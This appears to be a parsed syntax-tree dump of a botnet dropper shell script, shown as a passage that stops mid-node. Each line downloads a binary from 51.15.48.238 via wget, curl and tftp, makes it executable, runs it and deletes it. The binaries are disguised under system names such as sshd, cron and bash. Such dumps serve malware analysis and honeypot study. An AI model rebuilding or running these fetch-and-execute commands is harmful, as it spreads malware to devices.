ListNode(lineno=2, pos=(12, 197), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 96), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 96), word='http://51.15.48.238/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(96, 97)),
  CommandNode(lineno=2, pos=(98, 130), parts=[
    WordNode(lineno=2, pos=(98, 102), word='curl'),
    WordNode(lineno=2, pos=(103, 105), word='-O'),
    WordNode(lineno=2, pos=(106, 130), word='http://51.15.48.238/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(130, 131)),
  CommandNode(lineno=2, pos=(132, 161), parts=[
    WordNode(lineno=2, pos=(132, 136), word='tftp'),
    WordNode(lineno=2, pos=(137, 149), word='51.15.48.238'),
    WordNode(lineno=2, pos=(150, 152), word='-c'),
    WordNode(lineno=2, pos=(153, 156), word='get'),
    WordNode(lineno=2, pos=(157, 161), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(161, 162)),
  CommandNode(lineno=2, pos=(163, 176), parts=[
    WordNode(lineno=2, pos=(163, 168), word='chmod'),
    WordNode(lineno=2, pos=(169, 171), word='+x'),
    WordNode(lineno=2, pos=(172, 176), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(176, 177)),
  CommandNode(lineno=2, pos=(178, 184), parts=[
    WordNode(lineno=2, pos=(178, 184), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(184, 185)),
  CommandNode(lineno=2, pos=(186, 197), parts=[
    WordNode(lineno=2, pos=(186, 188), word='rm'),
    WordNode(lineno=2, pos=(189, 192), word='-rf'),
    WordNode(lineno=2, pos=(193, 197), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(198, 383), parts=[
  CommandNode(lineno=3, pos=(198, 205), parts=[
    WordNode(lineno=3, pos=(198, 200), word='cd'),
    WordNode(lineno=3, pos=(201, 205), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(206, 208)),
  CommandNode(lineno=3, pos=(209, 220), parts=[
    WordNode(lineno=3, pos=(209, 211), word='cd'),
    WordNode(lineno=3, pos=(212, 220), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(221, 223)),
  CommandNode(lineno=3, pos=(224, 231), parts=[
    WordNode(lineno=3, pos=(224, 226), word='cd'),
    WordNode(lineno=3, pos=(227, 231), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(232, 234)),
  CommandNode(lineno=3, pos=(235, 243), parts=[
    WordNode(lineno=3, pos=(235, 237), word='cd'),
    WordNode(lineno=3, pos=(238, 243), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(244, 246)),
  CommandNode(lineno=3, pos=(247, 251), parts=[
    WordNode(lineno=3, pos=(247, 249), word='cd'),
    WordNode(lineno=3, pos=(250, 251), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(251, 252)),
  CommandNode(lineno=3, pos=(253, 282), parts=[
    WordNode(lineno=3, pos=(253, 257), word='wget'),
    WordNode(lineno=3, pos=(258, 282), word='http://51.15.48.238/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(282, 283)),
  CommandNode(lineno=3, pos=(284, 316), parts=[
    WordNode(lineno=3, pos=(284, 288), word='curl'),
    WordNode(lineno=3, pos=(289, 291), word='-O'),
    WordNode(lineno=3, pos=(292, 316), word='http://51.15.48.238/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(316, 317)),
  CommandNode(lineno=3, pos=(318, 347), parts=[
    WordNode(lineno=3, pos=(318, 322), word='tftp'),
    WordNode(lineno=3, pos=(323, 335), word='51.15.48.238'),
    WordNode(lineno=3, pos=(336, 338), word='-c'),
    WordNode(lineno=3, pos=(339, 342), word='get'),
    WordNode(lineno=3, pos=(343, 347), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(347, 348)),
  CommandNode(lineno=3, pos=(349, 362), parts=[
    WordNode(lineno=3, pos=(349, 354), word='chmod'),
    WordNode(lineno=3, pos=(355, 357), word='+x'),
    WordNode(lineno=3, pos=(358, 362), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(362, 363)),
  CommandNode(lineno=3, pos=(364, 370), parts=[
    WordNode(lineno=3, pos=(364, 370), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(370, 371)),
  CommandNode(lineno=3, pos=(372, 383), parts=[
    WordNode(lineno=3, pos=(372, 374), word='rm'),
    WordNode(lineno=3, pos=(375, 378), word='-rf'),
    WordNode(lineno=3, pos=(379, 383), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(384, 587), parts=[
  CommandNode(lineno=4, pos=(384, 391), parts=[
    WordNode(lineno=4, pos=(384, 386), word='cd'),
    WordNode(lineno=4, pos=(387, 391), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(392, 394)),
  CommandNode(lineno=4, pos=(395, 406), parts=[
    WordNode(lineno=4, pos=(395, 397), word='cd'),
    WordNode(lineno=4, pos=(398, 406), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(407, 409)),
  CommandNode(lineno=4, pos=(410, 417), parts=[
    WordNode(lineno=4, pos=(410, 412), word='cd'),
    WordNode(lineno=4, pos=(413, 417), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(418, 420)),
  CommandNode(lineno=4, pos=(421, 429), parts=[
    WordNode(lineno=4, pos=(421, 423), word='cd'),
    WordNode(lineno=4, pos=(424, 429), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(430, 432)),
  CommandNode(lineno=4, pos=(433, 437), parts=[
    WordNode(lineno=4, pos=(433, 435), word='cd'),
    WordNode(lineno=4, pos=(436, 437), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(437, 438)),
  CommandNode(lineno=4, pos=(439, 471), parts=[
    WordNode(lineno=4, pos=(439, 443), word='wget'),
    WordNode(lineno=4, pos=(444, 471), word='http://51.15.48.238/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(471, 472)),
  CommandNode(lineno=4, pos=(473, 508), parts=[
    WordNode(lineno=4, pos=(473, 477), word='curl'),
    WordNode(lineno=4, pos=(478, 480), word='-O'),
    WordNode(lineno=4, pos=(481, 508), word='http://51.15.48.238/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(508, 509)),
  CommandNode(lineno=4, pos=(510, 542), parts=[
    WordNode(lineno=4, pos=(510, 514), word='tftp'),
    WordNode(lineno=4, pos=(515, 527), word='51.15.48.238'),
    WordNode(lineno=4, pos=(528, 530), word='-c'),
    WordNode(lineno=4, pos=(531, 534), word='get'),
    WordNode(lineno=4, pos=(535, 542), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(542, 543)),
  CommandNode(lineno=4, pos=(544, 560), parts=[
    WordNode(lineno=4, pos=(544, 549), word='chmod'),
    WordNode(lineno=4, pos=(550, 552), word='+x'),
    WordNode(lineno=4, pos=(553, 560), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(560, 561)),
  CommandNode(lineno=4, pos=(562, 571), parts=[
    WordNode(lineno=4, pos=(562, 571), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(571, 572)),
  CommandNode(lineno=4, pos=(573, 587), parts=[
    WordNode(lineno=4, pos=(573, 575), word='rm'),
    WordNode(lineno=4, pos=(576, 579), word='-rf'),
    WordNode(lineno=4, pos=(580, 587), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(588, 773), parts=[
  CommandNode(lineno=5, pos=(588, 595), parts=[
    WordNode(lineno=5, pos=(588, 590), word='cd'),
    WordNode(lineno=5, pos=(591, 595), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(596, 598)),
  CommandNode(lineno=5, pos=(599, 610), parts=[
    WordNode(lineno=5, pos=(599, 601), word='cd'),
    WordNode(lineno=5, pos=(602, 610), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(611, 613)),
  CommandNode(lineno=5, pos=(614, 621), parts=[
    WordNode(lineno=5, pos=(614, 616), word='cd'),
    WordNode(lineno=5, pos=(617, 621), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(622, 624)),
  CommandNode(lineno=5, pos=(625, 633), parts=[
    WordNode(lineno=5, pos=(625, 627), word='cd'),
    WordNode(lineno=5, pos=(628, 633), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(634, 636)),
  CommandNode(lineno=5, pos=(637, 641), parts=[
    WordNode(lineno=5, pos=(637, 639), word='cd'),
    WordNode(lineno=5, pos=(640, 641), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(641, 642)),
  CommandNode(lineno=5, pos=(643, 672), parts=[
    WordNode(lineno=5, pos=(643, 647), word='wget'),
    WordNode(lineno=5, pos=(648, 672), word='http://51.15.48.238/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(672, 673)),
  CommandNode(lineno=5, pos=(674, 706), parts=[
    WordNode(lineno=5, pos=(674, 678), word='curl'),
    WordNode(lineno=5, pos=(679, 681), word='-O'),
    WordNode(lineno=5, pos=(682, 706), word='http://51.15.48.238/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(706, 707)),
  CommandNode(lineno=5, pos=(708, 737), parts=[
    WordNode(lineno=5, pos=(708, 712), word='tftp'),
    WordNode(lineno=5, pos=(713, 725), word='51.15.48.238'),
    WordNode(lineno=5, pos=(726, 728), word='-c'),
    WordNode(lineno=5, pos=(729, 732), word='get'),
    WordNode(lineno=5, pos=(733, 737), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(737, 738)),
  CommandNode(lineno=5, pos=(739, 752), parts=[
    WordNode(lineno=5, pos=(739, 744), word='chmod'),
    WordNode(lineno=5, pos=(745, 747), word='+x'),
    WordNode(lineno=5, pos=(748, 752), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(752, 753)),
  CommandNode(lineno=5, pos=(754, 760), parts=[
    WordNode(lineno=5, pos=(754, 760), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(760, 761)),
  CommandNode(lineno=5, pos=(762, 773), parts=[
    WordNode(lineno=5, pos=(762, 764), word='rm'),
    WordNode(lineno=5, pos=(765, 768), word='-rf'),
    WordNode(lineno=5, pos=(769, 773), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(774, 959), parts=[
  CommandNode(lineno=6, pos=(774, 781), parts=[
    WordNode(lineno=6, pos=(774, 776), word='cd'),
    WordNode(lineno=6, pos=(777, 781), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(782, 784)),
  CommandNode(lineno=6, pos=(785, 796), parts=[
    WordNode(lineno=6, pos=(785, 787), word='cd'),
    WordNode(lineno=6, pos=(788, 796), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(797, 799)),
  CommandNode(lineno=6, pos=(800, 807), parts=[
    WordNode(lineno=6, pos=(800, 802), word='cd'),
    WordNode(lineno=6, pos=(803, 807), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(808, 810)),
  CommandNode(lineno=6, pos=(811, 819), parts=[
    WordNode(lineno=6, pos=(811, 813), word='cd'),
    WordNode(lineno=6, pos=(814, 819), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(820, 822)),
  CommandNode(lineno=6, pos=(823, 827), parts=[
    WordNode(lineno=6, pos=(823, 825), word='cd'),
    WordNode(lineno=6, pos=(826, 827), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(827, 828)),
  CommandNode(lineno=6, pos=(829, 858), parts=[
    WordNode(lineno=6, pos=(829, 833), word='wget'),
    WordNode(lineno=6, pos=(834, 858), word='http://51.15.48.238/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(858, 859)),
  CommandNode(lineno=6, pos=(860, 892), parts=[
    WordNode(lineno=6, pos=(860, 864), word='curl'),
    WordNode(lineno=6, pos=(865, 867), word='-O'),
    WordNode(lineno=6, pos=(868, 892), word='http://51.15.48.238/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(892, 893)),
  CommandNode(lineno=6, pos=(894, 923), parts=[
    WordNode(lineno=6, pos=(894, 898), word='tftp'),
    WordNode(lineno=6, pos=(899, 911), word='51.15.48.238'),
    WordNode(lineno=6, pos=(912, 914), word='-c'),
    WordNode(lineno=6, pos=(915, 918), word='get'),
    WordNode(lineno=6, pos=(919, 923), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(923, 924)),
  CommandNode(lineno=6, pos=(925, 938), parts=[
    WordNode(lineno=6, pos=(925, 930), word='chmod'),
    WordNode(lineno=6, pos=(931, 933), word='+x'),
    WordNode(lineno=6, pos=(934, 938), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(938, 939)),
  CommandNode(lineno=6, pos=(940, 946), parts=[
    WordNode(lineno=6, pos=(940, 946), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(946, 947)),
  CommandNode(lineno=6, pos=(948, 959), parts=[
    WordNode(lineno=6, pos=(948, 950), word='rm'),
    WordNode(lineno=6, pos=(951, 954), word='-rf'),
    WordNode(lineno=6, pos=(955, 959), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(960, 1145), parts=[
  CommandNode(lineno=7, pos=(960, 967), parts=[
    WordNode(lineno=7, pos=(960, 962), word='cd'),
    WordNode(lineno=7, pos=(963, 967), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(968, 970)),
  CommandNode(lineno=7, pos=(971, 982), parts=[
    WordNode(lineno=7, pos=(971, 973), word='cd'),
    WordNode(lineno=7, pos=(974, 982), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(983, 985)),
  CommandNode(lineno=7, pos=(986, 993), parts=[
    WordNode(lineno=7, pos=(986, 988), word='cd'),
    WordNode(lineno=7, pos=(989, 993), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(994, 996)),
  CommandNode(lineno=7, pos=(997, 1005), parts=[
    WordNode(lineno=7, pos=(997, 999), word='cd'),
    WordNode(lineno=7, pos=(1000, 1005), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1006, 1008)),
  CommandNode(lineno=7, pos=(1009, 1013), parts=[
    WordNode(lineno=7, pos=(1009, 1011), word='cd'),
    WordNode(lineno=7, pos=(1012, 1013), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1013, 1014)),
  CommandNode(lineno=7, pos=(1015, 1044), parts=[
    WordNode(lineno=7, pos=(1015, 1019), word='wget'),
    WordNode(lineno=7, pos=(1020, 1044), word='http://51.15.48.238/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1044, 1045)),
  CommandNode(lineno=7, pos=(1046, 1078), parts=[
    WordNode(lineno=7, pos=(1046, 1050), word='curl'),
    WordNode(lineno=7, pos=(1051, 1053), word='-O'),
    WordNode(lineno=7, pos=(1054, 1078), word='http://51.15.48.238/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1078, 1079)),
  CommandNode(lineno=7, pos=(1080, 1109), parts=[
    WordNode(lineno=7, pos=(1080, 1084), word='tftp'),
    WordNode(lineno=7, pos=(1085, 1097), word='51.15.48.238'),
    WordNode(lineno=7, pos=(1098, 1100), word='-c'),
    WordNode(lineno=7, pos=(1101, 1104), word='get'),
    WordNode(lineno=7, pos=(1105, 1109), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1109, 1110)),
  CommandNode(lineno=7, pos=(1111, 1124), parts=[
    WordNode(lineno=7, pos=(1111, 1116), word='chmod'),
    WordNode(lineno=7, pos=(1117, 1119), word='+x'),
    WordNode(lineno=7, pos=(1120, 1124), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1124, 1125)),
  CommandNode(lineno=7, pos=(1126, 1132), parts=[
    WordNode(lineno=7, pos=(1126, 1132), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1132, 1133)),
  CommandNode(lineno=7, pos=(1134, 1145), parts=[
    WordNode(lineno=7, pos=(1134, 1136), word='rm'),
    WordNode(lineno=7, pos=(1137, 1140), word='-rf'),
    WordNode(lineno=7, pos=(1141, 1145), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(1146, 1331), parts=[
  CommandNode(lineno=8, pos=(1146, 1153), parts=[
    WordNode(lineno=8, pos=(1146, 1148), word='cd'),
    WordNode(lineno=8, pos=(1149, 1153), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1154, 1156)),
  CommandNode(lineno=8, pos=(1157, 1168), parts=[
    WordNode(lineno=8, pos=(1157, 1159), word='cd'),
    WordNode(lineno=8, pos=(1160, 1168), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1169, 1171)),
  CommandNode(lineno=8, pos=(1172, 1179), parts=[
    WordNode(lineno=8, pos=(1172, 1174), word='cd'),
    WordNode(lineno=8, pos=(1175, 1179), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1180, 1182)),
  CommandNode(lineno=8, pos=(1183, 1191), parts=[
    WordNode(lineno=8, pos=(1183, 1185), word='cd'),
    WordNode(lineno=8, pos=(1186, 1191), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1192, 1194)),
  CommandNode(lineno=8, pos=(1195, 1199), parts=[
    WordNode(lineno=8, pos=(1195, 1197), word='cd'),
    WordNode(lineno=8, pos=(1198, 1199), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1199, 1200)),
  CommandNode(lineno=8, pos=(1201, 1230), parts=[
    WordNode(lineno=8, pos=(1201, 1205), word='wget'),
    WordNode(lineno=8, pos=(1206, 1230), word='http://51.15.48.238/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1230, 1231)),
  CommandNode(lineno=8, pos=(1232, 1264), parts=[
    WordNode(lineno=8, pos=(1232, 1236), word='curl'),
    WordNode(lineno=8, pos=(1237, 1239), word='-O'),
    WordNode(lineno=8, pos=(1240, 1264), word='http://51.15.48.238/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1264, 1265)),
  CommandNode(lineno=8, pos=(1266, 1295), parts=[
    WordNode(lineno=8, pos=(1266, 1270), word='tftp'),
    WordNode(lineno=8, pos=(1271, 1283), word='51.15.48.238'),
    WordNode(lineno=8, pos=(1284, 1286), word='-c'),
    WordNode(lineno=8, pos=(1287, 1290), word='get'),
    WordNode(lineno=8, pos=(1291, 1295), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1295, 1296)),
  CommandNode(lineno=8, pos=(1297, 1310), parts=[
    WordNode(lineno=8, pos=(1297, 1302), word='chmod'),
    WordNode(lineno=8, pos=(1303, 1305), word='+x'),
    WordNode(lineno=8, pos=(1306, 1310), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1310, 1311)),
  CommandNode(lineno=8, pos=(1312, 1318), parts=[
    WordNode(lineno=8, pos=(1312, 1318), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1318, 1319)),
  CommandNode(lineno=8, pos=(1320, 1331), parts=[
    WordNode(lineno=8, pos=(1320, 1322), word='rm'),
    WordNode(lineno=8, pos=(1323, 1326), word='-rf'),
    WordNode(lineno=8, pos=(1327, 1331), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(1332, 1511), parts=[
  CommandNode(lineno=9, pos=(1332, 1339), parts=[
    WordNode(lineno=9, pos=(1332, 1334), word='cd'),
    WordNode(lineno=9, pos=(1335, 1339), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1340, 1342)),
  CommandNode(lineno=9, pos=(1343, 1354), parts=[
    WordNode(lineno=9, pos=(1343, 1345), word='cd'),
    WordNode(lineno=9, pos=(1346, 1354), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1355, 1357)),
  CommandNode(lineno=9, pos=(1358, 1365), parts=[
    WordNode(lineno=9, pos=(1358, 1360), word='cd'),
    WordNode(lineno=9, pos=(1361, 1365), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1366, 1368)),
  CommandNode(lineno=9, pos=(1369, 1377), parts=[
    WordNode(lineno=9, pos=(1369, 1371), word='cd'),
    WordNode(lineno=9, pos=(1372, 1377), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1378, 1380)),
  CommandNode(lineno=9, pos=(1381, 1385), parts=[
    WordNode(lineno=9, pos=(1381, 1383), word='cd'),
    WordNode(lineno=9, pos=(1384, 1385), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1385, 1386)),
  CommandNode(lineno=9, pos=(1387, 1415), parts=[
    WordNode(lineno=9, pos=(1387, 1391), word='wget'),
    WordNode(lineno=9, pos=(1392, 1415), word='http://51.15.48.238/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1415, 1416)),
  CommandNode(lineno=9, pos=(1417, 1448), parts=[
    WordNode(lineno=9, pos=(1417, 1421), word='curl'),
    WordNode(lineno=9, pos=(1422, 1424), word='-O'),
    WordNode(lineno=9, pos=(1425, 1448), word='http://51.15.48.238/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1448, 1449)),
  CommandNode(lineno=9, pos=(1450, 1478), parts=[
    WordNode(lineno=9, pos=(1450, 1454), word='tftp'),
    WordNode(lineno=9, pos=(1455, 1467), word='51.15.48.238'),
    WordNode(lineno=9, pos=(1468, 1470), word='-c'),
    WordNode(lineno=9, pos=(1471, 1474), word='get'),
    WordNode(lineno=9, pos=(1475, 1478), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1478, 1479)),
  CommandNode(lineno=9, pos=(1480, 1492), parts=[
    WordNode(lineno=9, pos=(1480, 1485), word='chmod'),
    WordNode(lineno=9, pos=(1486, 1488), word='+x'),
    WordNode(lineno=9, pos=(1489, 1492), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1492, 1493)),
  CommandNode(lineno=9, pos=(1494, 1499), parts=[
    WordNode(lineno=9, pos=(1494, 1499), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1499, 1500)),
  CommandNode(lineno=9, pos=(1501, 1511), parts=[
    WordNode(lineno=9, pos=(1501, 1503), word='rm'),
    WordNode(lineno=9, pos=(1504, 1507), word='-rf'),
    WordNode(lineno=9, pos=(1508, 1511), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1512, 1697), parts=[
  CommandNode(lineno=10, pos=(1512, 1519), parts=[
    WordNode(lineno=10, pos=(1512, 1514), word='cd'),
    WordNode(lineno=10, pos=(1515, 1519), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1520, 1522)),
  CommandNode(lineno=10, pos=(1523, 1534), parts=[
    WordNode(lineno=10, pos=(1523, 1525), word='cd'),
    WordNode(lineno=10, pos=(1526, 1534), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1535, 1537)),
  CommandNode(lineno=10, pos=(1538, 1545), parts=[
    WordNode(lineno=10, pos=(1538, 1540), word='cd'),
    WordNode(lineno=10, pos=(1541, 1545), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1546, 1548)),
  CommandNode(lineno=10, pos=(1549, 1557), parts=[
    WordNode(lineno=10, pos=(1549, 1551), word='cd'),
    WordNode(lineno=10, pos=(1552, 1557), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1558, 1560)),
  CommandNode(lineno=10, pos=(1561, 1565), parts=[
    WordNode(lineno=10, pos=(1561, 1563), word='cd'),
    WordNode(lineno=10, pos=(1564, 1565), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1565, 1566)),
  CommandNode(lineno=10, pos=(1567, 1596), parts=[
    WordNode(lineno=10, pos=(1567, 1571), word='wget'),
    WordNode(lineno=10, pos=(1572, 1596), word='http://51.15.48.238/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1596, 1597)),
  CommandNode(lineno=10, pos=(1598, 1630), parts=[
    WordNode(lineno=10, pos=(1598, 1602), word='curl'),
    WordNode(lineno=10, pos=(1603, 1605), word='-O'),
    WordNode(lineno=10, pos=(1606, 1630), word='http://51.15.48.238/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1630, 1631)),
  CommandNode(lineno=10, pos=(1632, 1661), parts=[
    WordNode(lineno=10, pos=(1632, 1636), word='tftp'),
    WordNode(lineno=10, pos=(1637, 1649), word='51.15.48.238'),
    WordNode(lineno=10, pos=(1650, 1652), word='-c'),
    WordNode(lineno=10, pos=(1653, 1656), word='get'),
    WordNode(lineno=10, pos=(1657, 1661), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1661, 1662)),
  CommandNode(lineno=10, pos=(1663, 1676), parts=[
    WordNode(lineno=10, pos=(1663, 1668), word='chmod'),
    WordNode(lineno=10, pos=(1669, 1671), word='+x'),
    WordNode(lineno=10, pos=(1672, 1676), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1676, 1677)),
  CommandNode(lineno=10, pos=(1678, 1684), parts=[
    WordNode(lineno=10, pos=(1678, 1684), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1684, 1685)),
  CommandNode(lineno=10, pos=(1686, 1697), parts=[
    WordNode(lineno=10, pos=(1686, 1688), word='rm'),
    WordNode(lineno=10, pos=(1689, 1692), word='-rf'),
    WordNode(lineno=10, pos=(1693, 1697), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1698, 1871), parts=[
  CommandNode(lineno=11, pos=(1698, 1705), parts=[
    WordNode(lineno=11, pos=(1698, 1700), word='cd'),
    WordNode(lineno=11, pos=(1701, 1705), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1706, 1708)),
  CommandNode(lineno=11, pos=(1709, 1720), parts=[
    WordNode(lineno=11, pos=(1709, 1711), word='cd'),
    WordNode(lineno=11, pos=(1712, 1720), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1721, 1723)),
  CommandNode(lineno=11, pos=(1724, 1731), parts=[
    WordNode(lineno=11, pos=(1724, 1726), word='cd'),
    WordNode(lineno=11, pos=(1727, 1731), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1732, 1734)),
  CommandNode(lineno=11, pos=(1735, 1743), parts=[
    WordNode(lineno=11, pos=(1735, 1737), word='cd'),
    WordNode(lineno=11, pos=(1738, 1743), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1744, 1746)),
  CommandNode(lineno=11, pos=(1747, 1751), parts=[
    WordNode(lineno=11, pos=(1747, 1749), word='cd'),
    WordNode(lineno=11, pos=(1750, 1751), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1751, 1752)),
  CommandNode(lineno=11, pos=(1753, 1780), parts=[
    WordNode(lineno=11, pos=(1753, 1757), word='wget'),
    WordNode(lineno=11, pos=(1758, 1780), word='http://51.15.48.238/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1780, 1781)),
  CommandNode(lineno=11, pos=(1782, 1812), parts=[
    WordNode(lineno=11, pos=(1782, 1786), word='curl'),
    WordNode(lineno=11, pos=(1787, 1789), word='-O'),
    WordNode(lineno=11, pos=(1790, 1812), word='http://51.15.48.238/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1812, 1813)),
  CommandNode(lineno=11, pos=(1814, 1841), parts=[
    WordNode(lineno=11, pos=(1814, 1818), word='tftp'),
    WordNode(lineno=11, pos=(1819, 1831), word='51.15.48.238'),
    WordNode(lineno=11, pos=(1832, 1834), word='-c'),
    WordNode(lineno=11, pos=(1835, 1838), word='get'),
    WordNode(lineno=11, pos=(1839, 1841), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1841, 1842)),
  CommandNode(lineno=11, pos=(1843, 1854), parts=[
    WordNode(lineno=11, pos=(1843, 1848), word='chmod'),
    WordNode(lineno=11, pos=(1849, 1851), word='+x'),
    WordNode(lineno=11, pos=(1852, 1854), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1854, 1855)),
  CommandNode(lineno=11, pos=(1856, 1860), parts=[
    WordNode(lineno=11, pos=(1856, 1860), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1860, 1861)),
  CommandNode(lineno=11, pos=(1862, 1871), parts=[
